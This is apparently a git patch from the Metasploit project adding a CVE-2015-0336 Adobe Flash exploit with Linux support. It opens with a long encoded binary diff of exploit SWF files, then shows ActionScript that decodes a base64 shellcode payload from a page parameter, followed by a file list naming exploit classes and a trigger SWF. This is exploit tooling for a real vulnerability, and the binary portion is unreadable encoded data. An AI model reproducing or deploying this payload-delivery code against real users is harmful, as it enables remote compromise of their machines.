zH}TJ=l}vGOXlAYj01WEKO0v-x*T_TW%m0)kZan5bk9KMlfVP$C@yFkcQxMN#wYkhU zZcju$e4X9FOg-H2bg-YKC|t;+4*AXda>!KdphZkOo>h~7gk5arNF%k@2`zM=;14Dl zmY~P+BYI;6tFWYiCu}-z+zbqriQXhW36$^z+nIXE|16n DSj8oT delta 17918 zcmV(lK=i-KjRA~}0SQ`HQygxy004Wj2_*r46ehq1h>+H*kr$(#=jmMLX}!~2>@mr~ zFJ!Wlq0+?odkh;iNt}OJfp@eb(ds5FGJ?~uYifBkhzEPDtFbIrkTSfA4EBCvdboBZ(+(z8UU21ur1I28Iwk z%F#PPtpYoYJ})~_VAgV9#Z=Ac@Rb~Y4|Y;fO|3lcyB|xs53{=avZThmn2Iuh$(AV) zan6wm&^sXF;DV#lSA}Z4!J6d1h9O0tnNcC*s1v}c%$g2P)qt|yQ<0U6A3%+Ff^U63 zzOzH~m6gh{;vdwT&g4M(RYN16@sFiq!Q9 zIcJafJg&In^GRrT#_$&Cd9dt%l$0}nvG6dA7Cz~Nc2D?KX5$+f(*eWqd*@Gy#J&aV z1+ZM(c;GHO0;z#(T1<8sUf`}YaDzpPcA 6AH<_b$2ys+)P3>@21I-&L#I#AMO ziNWYlw03hJCgT_v{maNjw2hIo_+kqUo++;Mml|vG~nIPWRiqeruGY)N+=)qI%HG~bNY zm{VbWFWUO%fbEK`WSuxe{lyd}7O+lNT8l_{Cv{f_te#2Rq{J=SL8#7&r7pVs5zGNO zDR3gl>(O+S9e!G*XF(x*=4#cOQWRu=2DOYEM#BJVzwSvk zW&t9(D2GT~Bzkd3eeYQm1iE_5SVU}6uiKdcT>5p}O#hV|v@QEXW~Mhcd{&fP36_4X zX;&X8*aTPn$f`x?$oI^;5Wk-Aug|AQPPS;*GEGrrsYIkJW9dPp{}R`>UsZC~f@?F7 z3!^rsk1FDJ7p&BOJ=RHHe%k*vk<)WJ+pnmb5BrDxh{{jmS-fIV6j0u^i^)PIqeOfa zl^$J;1G zem`KOOoWfJ(achV!Ea5}iI`jJWtZZGapJfpXnK|xAOSRWRIn_9?l|~ni8sDZsk{`( zS}xz+>t6Td(&g)_i=6$&+1be*n}%LlcwLrEWytK{8f$~CV(Ar|C20~0MD@H{b7Y?* z<3W<}3^6Q!lTcSQ4cb7@y(Zw1Tux|L8ArP0@W6roX8{EfR4Iqy95OA?KI~>q_U<;L z9eD{aTAf5|V$o}0E4^m3sZ+1@loqwoToqM$&sMwV)y(YK%S1v_iT8~0BZ?7yG3;&S z({C{2c#J?KIGkD8K1GH_9?f}boH!21bD#DR8y3dyWL7ND4FnrA+7KqbeH6S@g*O~ z3KZilB_fio>_?5#FWALjUg)72tm8yISsrGb50M*&1^1T&kMJw0W7ImmT0D2H09#(B zgr6^euvPeViNzMAPmuhy9-kb=kcn75@b(9trL&>Xb1&ZnXQW4-^-e)Xeh5+Ytl(ax z6m#_m!iGCUf9r9OZGqaV=KclZkm17+L=%b3E28>HN?sGMSQAVgvh=)LSFXDWise?T z0^kPV#qW1puM8tgO=MM-xHU+4FP-$S-#^@c6;+pxRM6}INN6w^)@fGi-q3FWksn$S z1KR4I{6`0ksyZ_eZ~D3y{w^(?p7T=Cem|5opKpWrW_dJnK|0j6F+PTXyOHx2sGH$n z;Pfj7g&KDKGAdevrnx_@#w)EUqI(pFRnnpQ*0@`gO7E#T}jgt)L;j!^HofDls+aF^CO%r@c>m|vd#e;}(!CHf3Ml6kgUJ}oh zMa>6T+=%*5 znuiKTLD6IXO=79W)(&tsdzWf}m3x-wg2mdjg(njNnz117XZCp=9B&nWN~Y-KLqq>S zY%RkskUmhO(W?DFKZl|QESgS#JX}F$%7P}90jsLgn|uwm&75-B(tomgW}B#D3L-nO zLKzQ&=m=0S*)z@J+VV&1X5FFcdLc)<=tDszzb3Q+3p(Z&r6I@`XKDAU1D1+en~SpB zFW@fyz&q3$Z(Vx`DBcXR4AfnZCRa|O5X}N`h&~zVbO#DNh_3S-GVDEnP0xXh5=$j- z7P1R#{*aYj;M2J-BD^Sw{*}Di+XOfsHPGyddw%8xEYmfVdd+1g8lKUhTHvUx1H`Yo zKP5-y_)7vXD&z7fJK&|ldjaDfcS&6yxu)m#u>sj!6_j*spreiHq}a!RJ>8xmD8ggL z!pbxIVf!*(*uFFti>>v4@)v)I!F~zjSis?j(f!8;JPHr-yX2BsB4c0C(A_l6)rkh z#}tMhGe=6$cg>}pgNcT3v{`72R##xMC zcFvU{5v|_KYB1-kjtFO~U1NfAEZ~6M!)4&}^vrVsf@oL<(+~RjYv_$S#>&J5eGRDV^F z3VOk`^=-!To^%@S`2aBAieW57@~or!h_o3h0`Y9wGa!ja8$aAM71uM^$y@gZNVJpp zsA_*NU_7T{he5&^7A3J&_Spz5O{a~lK8Fs-xJG49#a#A(Lqr8$rU4&V6SOACQ1z*e zpUSN?K`U3`J|0NKgPkm_SZ%A*++T$QP@Vkt!~R~HDtN6P?JMfQ-v}WF0`96~6&&+n zq!;?-N+X>25`B8emhyzYJjPWkR82CC|4UgxQgw`Y5y!&yr`AK33>5-zolb^x?()Zf z8|jFI#%~mVxiW6^X?o@evq zES3&X^dS2E2S`$>aW$Ot)*lw_%OGEBRwU8{XsfvpDjpth+_n2@N4Ou}-s8+e2ZZ|l z*S``61T)4BJ%D{ksZh8-p=Jk8j!CtI_^`UkChR$XMu(SDQ=8iWo$ir;9gNJ2gKN-! z!2P`(akVXUjhBQ?&hO^iC_=iitZ73KvBk0-RZEG4KJ{=d{LhL38~hx?(z#B^Wdv~3 zs)-W_B+@l&MLnEzEcqVJN1mbsK)KfxCu*sWqH$CygMjb*3i9-qLFL}8L=;CvQz*Oz zP(mwz_kUMXwq&n~>xv2w>Hfthl>xJDN9CVsKlzN`;wc_qZ_c3CEYb<19p9NqN*s*hOw>mSuPJ7$=Nb*vzL!22Hu9^(Rjzi*qh5p$?H9 z4^t_xd9Ezu`$nuqK3bV49SU3c_Tv-~1#pqm z#*Iual^i*MtxO6FL_iL2O+w}-z`rB@nX~BGD<8@W<4ATdi7BXMVO3R3_lG^)nJ-H1 zEA)J>S7T<&-${H{5G*R{;KF-}vMn8dqC{s-+x1I0sae$E86&dfJaAgRejztsvq=jr zZO}NwlIDpkXy6}wo``-> z++KCl?|jnTW@!16d-hzXdP|rOsKRqMUkBx82}AcXyF@*MGvNb&#w1)| zcTIjPJUX77wu|K2BKjkj5<7@<+k8bf4&SsG+1)??2a9}~S z(Y$G(zzn`ZI???Aq}lA%Xo+1A5D%>^D2#*$&qc+?b&)wu>O^9zf2?pvbZ}jN;qkG8TYOxI zUwtK6>jdOh+(iNm95vBSYGqHFhU2vb9JeFAo6?9xs}X#Jv!-5pK=%-^brAPH%05Ic1+}+2%Gz`uXVjet8r55yG!OZk&wD`)1;%GOXfX$iJz+qRC4M)+z^B zDIjjN*&Vz{bbmhQ=0Ko-XC>1Mh-j;D50oqkHMW~91_8TuUf&1$k1HqFTGTqmqg zj9xJdbf>VGCcajZ-9bf-aTRDT7wcs+pIX*-cF7v{izeKI*B@x%10J72wka!LxlcdP zi}{?*a_f+`(F|LEVkY`+W1UKoJZUmIu3ZjzjvQ6H6^5^at8GPQ7?U>;adWwuN(YpD z3makl)Mw~$moJ3qvapuvd}=hnB3#*psWVM^`Gq1rB-sJw*d^yC5yDR8CJrJOpB1`_ zLRyO^WCx@v#>SES>xu9d(724C4agD>c?s^N#goq~S2O^B_NEMDPaV0k<$qkcR9kU^ zGRx9M;2zCcjjz>>q+1XsG#M`G6botG;Vo%hCR=iS$%x$qsEpPcKcd><((p#;o|Bg!kw|f`f0CSyjooq|9HWdJ-&Y4Q=HX=iRmsb zJiF4$wfToxw<*1+a$Y#&Z80_>fo8rY$3Zz%xt>q?A=S(~T$X2sD>0@#+ofE-m zy>(rB27elS|0?f0q@Pf8lglciN2COrhuAQb#1&dTYPV&UC9Nfdw+J_r_v!+eRcbs* zFh;k3mORy6>&rNXZWA27ns5Jbg0Y@g{aG?F=`w|4;dDqQufxyRN#6wE4={S%F;o5* zk)C)_9ZWi5W%+yH_y+uD1qb0d@b(m?@SD0TrGwmC)#9&kM(+)H4o9cy39wx_FshD= z!f7yg_B^+rCCmvRFwp>Lo4@`2E-tSNu)~*s$usbdjy|T~E`x7S6N1+s4^PqJjlQ)a zM;=9sa+rHf3qNH;o|>J44kozi=33`TDaA~ORCBpvAZUQBkv7Y@v*slf|vxI@) z1S7l>x7W2d{Y{lq&ANEXCY`mAV}8m{zmBUi;a9^|@F0UTS>1iZ25nTHkoopbRc*0< ztD>0ns{4TwGkLHJ2vf|VGOqp2ux-dSxf`lqr;;UE*=dvk1yc@(zro2))-k0UxAvj- z(ngKIpjW2Aqp7dywNj+-f%<8`)};5yJMz_$YH$aY2R_w>9%o_O@-!rpQoBBUqn_0a zemg<3Dx4FZGX5?odNG^7hsi;%HSn^Xj=1Cu#DOCuD#sNwRgo+3Qi^lyQobT-OYcC=QSKR@U%Tug z=r_twxODcOZ7=1#l{RHMhm0A2SS%;5z{IgR#re*{ufq`xLDg^)nZ(~Jm?$GN?i!to zu!LaS^+JE!d5n?Qr%Z2|*Yul~CtdE)5Ee*aH=02HvOwXVJs}h3c?55rut&euSF4ZQpep* zT2Be%s3C)b9x@1|DCEH_)!V#}WM`Mz@!HjW$B{o5p7N4<_xcZ-C{kS4q&q^#T0v?5 zI8QB>W%J(Z!WOxhrI8kJi=EHl(e1>9C7Eop6ao9ZD_R8X=a`=IY!aK?q{3Rg-m_Ir zjaMeDCYm!$(Xi;REJZw-t%&4CZKqq`S)olAAB+AaaM`PP%b!3)NOuu z079YP=Z$#1+iMHIe)0Dnq|?hzhWBN85b}s-h!}7HLCqu-9YRifsr!37?zWr@0Ng6n z_=1a$N4QeiHgTYT-^BT|p0=OZ(vcaR(Is*ww8QGirG^q%5WjQ z0ZvBU_(dL*@4zP31dF0cWXg7$UofmE@mXPpXR$Nhgt3Y013=2;NkmsnRJ*Qf_!5U} z0{#MehH>sQ-=rSC*C!9Nw5tZC(QfuL{wDdE2C2DcE1UX%mUH> zaPJ<79L@clBCeHI2lLKXJedNP*TnzdS>CT&&K{lx;PaR;;i@Ta;y!-FY@U{#7QYszSN?MY zVRhu_%7_1dkOSVv=HS7y^Wu5G@J@1k?tM1?Bm&vU^~eUu8rGZBZ+1KW9%J4M-`P~3TUK~*rOTFLHeB4Su97mgofxoe`(_b zG9oqR#p=RO7o*y#J?2Je$ihSVU;X!oOvM&&DuVc-z8hKfq!!U?vJw%%3VW6RH*mN~ z?sg}CU`zA*gHr>?rJ2M*-6rLe!AyNA+Z4GXI@8{7`kk%dh_5WUkk5nqS9LPgW-=w3 zz!CBL@Mv7lQ3AhX+YI*HcCO_O+c*=@esE(4OIEhj162o8dR48PedtV*d#pxj>(q}L zGZ)=maTyz?G%iGW`r0&Jg=XUTxf`8!MtnwpPHst(N(F82XhMMqbn$10v`v%hXVEq0 zt&2EIJOS%tYDOJJ4(fp3PFd`?!DzJFgjbe+Ku3fD%k?2AIt4rmANSRomW9$@Ey#A= z$fsGb0vLp;L9U5dR~EtnR0P#!2;yF_c}J${^CiyF+ukLzbLa|XxreoZ&O85?^xnRI z4X{QaMTRSs2&BwRaInG}2O$9ShD?2CvB1KfQKC%mN{B9h40FN#M!iWCFK`&9E)ZO| zdjW4raC_76Ndonf(PGLF3{22M*6|-l+q?aphi}Q8su_}0BT@Zf1@$?wY0?;xMV;sU zboJ0QkDAR*7h?09jaPypE58Mc#lCER5prX?;S|$pAWz zC^Zi`3yJ~gKTqo~SJTgqKC<;`JY#JueDwl)EEOpLeY%suzfMZPD0URKmy zT#!%LTJ$mlq5={W#c;=mo~9U}o0ycu>Q$n%GR857MjRbX%B$A3WXH_T}t`Qgq zXj5lD+q~SIR2)UH@+;un*Xuria2&<2^1lXjJl(mlG0f~>!`~i4fLST^kCr_M{(wModu-M8Nkn2XAMy9p=tSZ%>~ zzHe!2bnEShK!=0bW52wk>hr zg4<6ZX_0I%0Is4H4EAJEg_LUYo=Mbwe!3N{PvL50` z$tn8R!rpVRztvI;zu=*NM20~;n#NWYao>n2RD^twT#Xmk8}D6;qF0oDS=Y@T1heg< z1gG*sgO2zNK3eZ8H@+kvCm*UmwPC{TjN;EUBW2M)NixsGCS9S23m8nWKAzO|BJX|@DW4^N zNS?tNJl0h*Tfa!)Rv|@{L6GJ3>5RTq;O-oa%119nfE(nXWvzd+XhJ5^;(4s|x!CJ( z6?%4)Smg6QZSd@W75#G7!+aOjiL4+uLePALLx`&3^B!RwU zVd6^$>{AveH)CHE8=zhjY0Giec;${JfNuPB1huwQ6_9?$v!E42ACb}elcW$bQqE1K)>Ss(xk@aS{ zm_zFEAUkb0awoq)L@Mq0=G%_;di>Wd!SXHreP;1d5_3cqJx9%L#Crj+A>h&IYGauO z%XWFXofGIo`*Ws@qvpyoBd3!Sp9Z7hO=;A2~bV+;iQTJJ=7%}BS zj3u2AXcn@6j%gNR19Ej6frnzbp%n`poZuYI?W-V1Z+FmOPwXv~XeDOP%4c}!WuOhh zst8||IQ>lSwYEgj%VV4XPtL(Z6DD^(Ov0M0;+TVAHem+LF(Qg2WzHcrB?%$ux`d;N zOILL8qy0~gof+x`Z1pPM4krI&zN>?5HT)2gInS4W$zxw1gHEUgQ(z5W-?gAMf+4Kg z@lhps8q!5tIvxRGCb;p{DGtCgV583;()HIiqSF|`YB;#!VK|Lg_3u~qunf;! zR8bg+R%hjY*C zy@M6|1jPYUh%3FE2vjqUqL%Cry;m*xwBA*J78T|ty^GN9FVb;9T7NtsZWLiTm2gY6Q|Q?3F&SB1XU>Lz9Y8prTy$vcmr0t}v2R=zph3 zGj&+mG^DHAs`ICI?o%0B?E+}q_wZZB^42Dr>Ufn3W?+wPg<)GcnlvMS5M!&8ExAIp zV*I92fPJ>=6b|_|YOVW<;B!Da4si&t(%J{EGgr5k}itC~>XK-(1eF0h|7SPro( zz=Z?^Z3Cs-k*}UZpUmG5$+Cay#FTCL<_teN=v3{W%wu9hD`XKn7hbsR+;6qG5`miB z)@FY^DPxO9FhBrF5O`fq<&b+ScvR{Ynm&W*3z~rQ_XTQmhsiS+DxPG7gT8owy4?ti zI8P5bgfLy^O!V-8Kj4rq`t9g{-I~=?9_<&ns;~}JjMu|k`cMc7J1AKQ(w`NWq0ZN5 zVqlnLr9?2rg)0#pZHm0G5){&hI5@B>)C{n2phg^zh#<>Y2@0geEZk#@c z8i1YZh*etF;VxY4REn)g(XFe0#Vt%ho_-|L@kK(2BRq-q78R&~UwOGe+nfX3*>pYM zcy5eyItXOD)}|f6Y1SYejQ1Z1SkQ1C2NZC`q|KNGbQFfyd=lwu%Y&NR$#=TcRCyG= z(g`ztsZ8~2qVj*$cf~nSl7^lF-_CXSNzYkugE*lxDzV&4&CS^I9p$=zZ`!L~e^jLT z3Be<72xwcvtwjNd(APA@IK>p{=b2Ag^cB zmqLEPBjR10eAsUwK1a-dn({(V`lQ%7^NIKaJoD|%A-2*(#_gpbat5+}&R9RxaKdSw znl!;cpHz5175JOXoxQHem*TNn>3GQpMq?8ad7hd;ZPdv_MT`~(kn3d23y-zxHaRda z0aS`p4OVt7S|NnvF6Mwn)hNShinTmT1~YM7klI*%1mNKHx0vRC02U6U!UQ$&^x!Ht zzbL9v_G-2|lytjPoAfrqN4WM!@TtLY23Jz%bNmYU5X*d@p|c`Y*4^RRclVO&nldug{8f50EClIQ0|KT$5gJjzGJHckQ| zgRY#XQ@CxAtpyp=mt_plo>!W0`59|_M=DtK^2R2PrK^abc^x1-TN{ni z<*X^fYw+8Db7bcJchSNGC;Zm59vm;h8}8=|k;yTD{Q_&($=X>Ud1UJweC2f3?4uyD zVaUUEKhWFTR1`Q#u9ccCe4}d+kCLVF!y^CrFB7qt7{WeeO5KGGb~}-|>&!)VMNdOA z3|UvA0-1i=odmw5j`zrM^LiA9Sbo}g6%)P0xzovi$>2m;Q4I&x<)o4-E)K!Jq?5Ez zcH3VPhnqAv8cOOjrB}HUY(f0f{5%d36HLM07{KjP9)E1S zX|wCU5C;b zE{{QEG?ZDR7S#~5t$>l9D2D~Bp7$VuAhXGIU~T&%D|KYd7Z(?u#9*x-*nyYr(1p~` z?8xir9QSsfmA|$+mg%swkA|J^0?2Y2jx925HPx!dWVL~!o(!aE!0LSC12~$i3eCTN zNEn|1rHfMOVTfwMP+nH)tg8k}K0eX9o*2hE73@?+8ENi_a@;Q54(v$Bq?wEE~IbpF* zgdL@YT%QfhD|hmoLv0l2c)P*=DT|ujc%jtaw_hDyt zbv+i<_~O8cGM)d!%x)BStDw7oQb`u%5Tq%5vjP}DXW68THf=3h0TyY?-;MZx1K|kf zA{>U>dLfZW^J0-yg<}b8l@fBOt=*RL=$I%x$25H0eiC&@ENQt9E7Afmi46&W20&oZ ze3)LxsP496k>>x8TDd~*$V~u(JtWlQ%^#UzVXA&htO$ubI!*@+TWk`4P7(~L>KS~N za!Wk6weS~2b49*tVCG_zCdsrrrJJ*Lt<+{WLd|S4XbR}G8gYT|IA-;##K;;{16X%< zw4pbag<6#!3zj%=!C5&--?@GBxbd)u%sjg~bm}@PU1IosB3d7*V;yxZd{=ui^uTwQ z%oVnC>Dr}w?~+I9(<8=zX$7HNE%?^#to$U)kZk8GB)0|EC763M%onw{^<;|F+7KMF z$0p4`&hcJwEj@F4S-|eON4n>Otr)qAsNQ-L_eCNbg;DNwIx+auKI_VbxYNmn|T%kHupam$&6p%hL0X$6Vq~=;R`WS zgEnGLB<6(A@&#i`whu)pF#{}@kGgvXrwk#)Q*>j^Kv|l9Sp7)>F)x<4CZ)8FEA$yk zChSjfEjvw)>K*lehs4}4WfEFx-m>q*y=rw1hfri!8<$<2g*=5QqZlUg5)A`aY&!Ao zqeO59Ui1AffX9D(vE{o|V>I9*ahVt1y-zc*LXah-DXtYp_1qY#nX=u&i5lv}+VKO= zc}JgqYcWarl@^uTlVr)P!)A-Id+*$aTi+B=W3+Xk$VCo+yxGbfCXz(X8!X$A`i4oZ zkQ9))&83$6o^bPkh4{H$B`Q}vk=JxpSk+0U!c=JcEYD^9ac7;?fugAa8-v*FAAJa} zkFD2%V|8=ZtgN-1T{&=le^o=UzPJV8d+LR>x>~r^dee>Z>gNy+pHy z*IJP@r&W%B$#Xmqlkh@z0im?#dWC8c`p#TFK-sX6KxUjHBMgF^{i7iEY(5~)q|QI# z5upR+ikTp_X;Vvrp5cRH2J=>RcC88))h520$RZT+z^iG;EbEa%s1mEsP5%D?a{3XyI}i^D0<>Of=e_eF>z0P)4sKde3Z6hGJeB z%LKFzU3vp=65-!AE4c4%!SiM|-#KQy@}u3)i5B8bDZBfCA%XyUTRUAq`g&I&6@rz% z>(~rCAfD3&V^{?m=E6n_O(ecsW^9(;2Ey27D!bW z>Uao$FamR{t*;VfIdpJG)Y`v_u&htB{nth$tyG4U1Uj53tIQWpL=v?nWzdtISkQ}N zp{+ho5el;HDt`*3ELXFZy`+|M(9ldVhgN77C31R?S20rFw(1vo2V5`3vD7LPRNd%ZL%;b7?_I0i%bpNVz9hT~8+h5Ri3?qIP60dOPN zY5JbjH=UiWbao%3uYCmqBY6mqsB=w+afpJu7aEEOw?KtCW=?P5yKPj7^OTogkYkJCXaJ>l`dKio8p-!p_FKV_-}Su{7*yF zEd)IQXy28_{d__4)xOr=5d{miDgOgRK~MH%oI|4l-Ge(Ff)F*t*i#(*dl*b?6kPO@ zcJc_lE-Zo<2Qex2OP6ER_#7fGbH-qQuU8&(Er{EwG~MOI`dYjX1Gek=dbx&C$Cb06 z`E2~bsg=IAgJw+(dz5oQyUuCS=0Xr6=E{HR!F#yC9;f!t=90(-TX#jY#KpR+&R^Dc z0xZ5lT2TJjATRU~{YgyRBeZAlcDFiX2I)bO=EoKRK5(>tlC;d+jTM0p$=+&zhMA>v z03?>>w-tB#c@JWWd`;Sh!U%ny*({Kw&L?4Z12UF z!=r(=svH*pf5-WwU~^|i$QpWo9d4fmR3bcgN3JtBvz|b2r9ahIaQK?Xg(PTU|IK5H zB`Y;&@&O^){t4OKh8drd^h+RqhtrQudVJFdp6x0}?WtVr{Hj=P@VLFf)YDr5AIzA( zU<<^d_FJEj!W0i1Tg}VHyg^G87KSd6cW*1{m6koHi?%@=L3EYBD&6IYO?EEomuR_{H!zhs76K$zJs4`;#}<+FED6RIMI9RucfQd%s`g_g~i| z%+mw;Upw-N7kG$n~#cYie;UUxM}1 zTp$9FXNL}6NI6S?=UqlIi&1kD9R<`QrOr_Qc5&SAXNOC{gH9@G4*Ze}^C3n!f$z0E zebbRj7er>YeZORQ%)qll_$;cuYxyW`l=oB|*WHYSS;fYec;UJls!5c-{2RD`U2LI= zf>7PKiZ#34nq1*1;#osy^KlsE^h$U_Dh(i!y-96}#%9HT%P4kZ#6FE5T9LlS;t56= zNq%g<+qMEdtfbA^jnVfNNu}x#_M^t0rz;a0J4D5+8~S^F4{ge8SKYNRe-2ELo)tL@ z-5E&^n8gpf)KQVySfv2sU8eH>BZj&C^LGXREWCNQC3TZEd~2pwQW*&?fN#G{0}ULy z6s@*VjBfXTsY*{(z8lK7C@;ICR<*&>JDu?OF?}Go>UPhlddG=9ty)gY?Da0Eo zB~q8$mF1uVYMB5^dT!!khYU)gk^ZRM0?TQvXqr6{I;t?cs@5auz*s=wBjg_fN6$kK zvGK9leAcgwF?m`lH~HdEE$YmHdX(lmr~Hm;onEegLumYB8hg0vIlDO!qznT7>Jw80 z3y&?q9%%#`9CFc;SFz?yTag{KF=;0Dpi9gJf4wPAOy#6#VY*pBbxO-h?xJ@Z;~_Jf z{ZqH6=wm+vnSJ?I#l?>8a#zcL-HsH7mW6`53`pN^k<s#>s}4A>{P zEMCDVyR$XP=UN{IwW#PQH)}GEm@HKnKRhXX(izaX3gA}-^)G8H%ET7nb03<+!~8E~ z)veR$W)i7j*4;f0czbum#<`WHjD>iAO-f9HFe9*U6dbR`@J>l57}tWKh3u(NnB8T( z>EGBClE-^Kjzb#-QI=6FP)pDK`nyx?^k=e&X7}$Ge#YZs@Qj{&8>!H})Ogh7%te8$ zo6*Wj&~nF<%PS1WH2WUTBP!9=3h-0fnY>lrK=!h!32cq-G&lN)eNHO82K#Q3k8 zCG36-PeqSy-%J_tYF7{Rca(9ZRbl9{uFV9+XZkIkm&Rhx7J;>qF%ONgI~;nP5SDHfO)wqEXNN--3WdnLOMj znMWMb9Sg=e4FRNaTcKX>RFTbp3iAn%r4HH@(sl%1eMVy+pOW>ld4LIL(^Y!9W2aCC!ZhOUdg%I0D=p>FEuDE6}P^BIB3adEq`GY%@d8cr|@ zYxi(GRiM?`=w-~+!*PLH{zd_Z$%E|OSf1pdDUp`K!DY(=p?2OaK%1d|oz-KqU;;yZ z65~Oxbr-arBPLh1TQTEH8_RL_mI`SX7+;Mo;Zm&cF;`Rf_XEnRr1+amdNR!@GzKbK=ACX2QWBr`C?|&f!mUB>k|AzUW4eC=5l8}Wyd2k=@ z?weCMSii~ntc(A{KOgg#x*s(N$w75ZzH}q>4z_tFuE<#mjuBjct*-fJq@`In9{i96 z+_a39=_-4;&N$r%Ma~HZyCv$KtlV`m9vC~JmBB>18pB#mD7!0|EY97ziPB6RK@565 zI{#mmDxJwUj3t6sN?HtGn>J+NtmBU_do z+J1whKsLM(XgX7WT7T|DkQ}N7mF(xJm47kRf@UT_uNEZr+rlp#{qNBTEyx(RNGd~_ zk0dXBidqaWq%rwxPCsVAUR4`rroA7~Aq7#b?&S?M>#la@jZyKv{&Tns%JZ*NQx~h3 zDr(Nb11%0B7pqJY;~-_r`pbV3+29v&TS5@aiUXUVPps@0jbA~C z1i!KVqpT&udD^TZIo+-ZTzrW{ea>2-kma&B(#@}rTj$|#<-4Bcaz82n!s?HS~M zvTIk?5vWbWi^rTjy_kP!pbWX654?azWN&Xd{l6f~W{lJz{cb3pxOhE9#22l@KZ89F zZnsRODJhSCjIdhb3Mc@=+7vsgwVy!^-47?${*_0`*%=d)iR!fZ>! z<_FB^_JsA%f0s}= zdS76Fiol%{g9aJ-Ozp1U3~~-eu!ivB*jk`^3~Cn8ba-KRA4dc!TF)JLK^~9X{`|QP)j1say^+LusVMmwe2hP zzRbdr;t`dnT9MtA6Kk8IcrTbl%JFW0$&;y7o5fFods8{@{JD$7^@Hoi`PS9_g>Nj_ z2n?;bHN(n#3As#PD50xC7evHfm8E^)v>A(qz3+mmU5(WQj*;3$+*~WW-wfP;h!5Ef zt6O1c-{&7ezR|D39w9Wt?#u_4rZp%m=v?sJHu9pyf<}dSt-HuTL2A$`HYLjEm6}7+4jooCeQtxus~mbz3(}@hEZ;ej9Aj<0*T*$7;XEJI+FiQLoyt6BrusDbY8Up@TB^--w1fKp{f zRYc|6X8-%YVk@P>aqfrQz1$xDSYUQh*#)}ORR;|7Xd(;@%lIZ33}!r&Sv7$l|K8Z* zDhIiVWlD8yzbV~mDlLG#!c{er&U`s2pNa+BipDfiDUkE!3<*pwPy(E9O&aVMcKl-R z`LoAy4D&PN>GqO;EL@x~9CWjLt?Gm|?WG{8tI(i#!Vxpr+f)Dc+H8$Sea?ffl>28Pw2elBwytfat$Fogny_B&;|DmxB<&gS(S7TA?h1S+bmM&LDbcLC zTT!qNQa=+J_dV=(3Uz)bh~J{2hyCmt1R`zD_(mUai@bMvL>^f z+s`0>ai~gvz17)cq=G;vKS%hP5cLnM*s^t$FHgx0wrD!4KT z?xMe3me_Q;XK;zIK-#KW<8a~>iCgO?yEUZHe;q4qJ+*xXI{~N9ipf%4x_8AtzljHq^9Zg5|39m%XMRigre}Z*`^3Fn z3poSewKC&3t%r%=_fac#+5Otcqf6Z}#60qQV`PotbBjMot}{ib7&*G3=hW6Cf_?KizaX7KyEZ`~g8RvU#<7zX*D3dVGn)Auufio9z+d;*g%V( zRkwl2>S*qkGR{X(C!881HCp|#Y!R;6djfK{e_ClZPV$9+mi?Iei73hfBDvm#yTPYv zRwh4yFw`0a%MvQv5O)ehAiG5_dWHPpIj`+Bdz_t=@HYQ|#GkyIpnyY6YN_Xe zumSaX%D}Ob2S5mEWliK~a3+TcFJ|!|3EIx025k|9R5l|FzYKwn^CEd$kPfMN+|qJ^ zf6qKJrTFes>xT^DmVqsuL3YG|xXr25FdFQY3&$o4*-+Lsc~SlR`wHWavua2Dg4-sC z3;ofb3`C;h_bBO2q0rRQ47Q`o=j4+bGpIk8Pl0g+mw*`5AcL&mi8af2wS&TVQJX-hCsZ89Qq}6wKkv#+4Mo zO9jtGe)5EO%%Td=MUSJyr-D8D7ez9J;6Er=a)({-Rofptf6SIn zJZTzn`vz-FT)zejtif9uX<+{S5pW01~I==mDpM!vGq9sMo^L}ojeja9oA zylK)m-etS^^JPO_qqe;Cb?UCx;F<}*P*$^Ycs022aKmi{X#pT(mE>Wn@DtZcxl8$+ zqPoaa>zyeClNd%XYnMWY)G=g+cuGr~CLq>wkU?l_qttrGwI)d9YcKETfA;0_ZHd(6 z3%P{K+u`1VX2?bl%Pa#IeNc;zkv%TpL2tssH49)GqLpM0X9)oyk#|5@Om~%&(!xoU zEzt7#K%0|+bfL9BmrY-4tm-ev@lIU;d{24M%wx;Z-l-`&uN`~ZC&bZdVPy|uq#L5Z z6iQ4s812?Fo<1aUc`^HIf26#cecRIrn7DvvfUH`0&()LGB08vacjRtybI8dxbPeUC zo|n7FEe|N)bwk%V!We}+rb{f==N=GIKUZmu?7Q!{(3F#JC)Je!Ou(;r&)vMZ+fxw& zv?uHt#gFy>0A$a56`=1fh%HyzLiD{?0#8X4wHpukwISDJN7$}~X$@{3Qr--)IYF-p zzRlsHlyot=Im2##l~bftw6F^UQ!MsF4ECa&s5@~>@^l&E3aTV@fnTkfOa#xSTFJB| tWQ&GI3DxbGnIu;@#1`0d8HRCBuS-4jE6{t38tV|J^M = new Vector.(0x6400) public function Msf() { - b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh) - payload = b64.toByteArray().toString(); + var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh + var pattern:RegExp = / /g; + b64_payload = b64_payload.replace(pattern, "+") + b64.decode(b64_payload) + payload = b64.toByteArray().toString() trigger_swf = LoaderInfo(this.root.loaderInfo).parameters.tr ba.endian = "littleEndian" From e5d42850c1bed947659ab1f5550c58a1ea16c175 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 27 May 2015 17:05:10 -0500 Subject: [PATCH 2/3] Add support for Linux to CVE-2015-0336 --- data/exploits/CVE-2015-0336/msf.swf | Bin 18121 -> 20599 bytes data/exploits/CVE-2015-0336/trigger_linux.swf | Bin 0 -> 340 bytes external/source/exploits/CVE-2015-0336/Elf.as | 235 +++++++++++++ .../source/exploits/CVE-2015-0336/Exploit.as | 120 +++++++ .../CVE-2015-0336/ExploitByteArray.as | 82 +++++ .../exploits/CVE-2015-0336/ExploitVector.as | 74 ++++ .../exploits/CVE-2015-0336/Exploiter.as | 251 ++++++++++++++ .../source/exploits/CVE-2015-0336/Logger.as | 32 ++ external/source/exploits/CVE-2015-0336/Msf.as | 321 ------------------ external/source/exploits/CVE-2015-0336/PE.as | 63 ++++ .../TriggerLinux/TriggerLinux.as2proj | 60 ++++ .../CVE-2015-0336/TriggerLinux/src/Main.as | 18 + .../adobe_flash_net_connection_confusion.rb | 167 +++++++++ .../adobe_flash_net_connection_confusion.rb | 3 + 14 files changed, 1105 insertions(+), 321 deletions(-) mode change 100755 => 100644 data/exploits/CVE-2015-0336/msf.swf create mode 100755 data/exploits/CVE-2015-0336/trigger_linux.swf create mode 100644 external/source/exploits/CVE-2015-0336/Elf.as create mode 100644 external/source/exploits/CVE-2015-0336/Exploit.as create mode 100644 external/source/exploits/CVE-2015-0336/ExploitByteArray.as create mode 100644 external/source/exploits/CVE-2015-0336/ExploitVector.as create mode 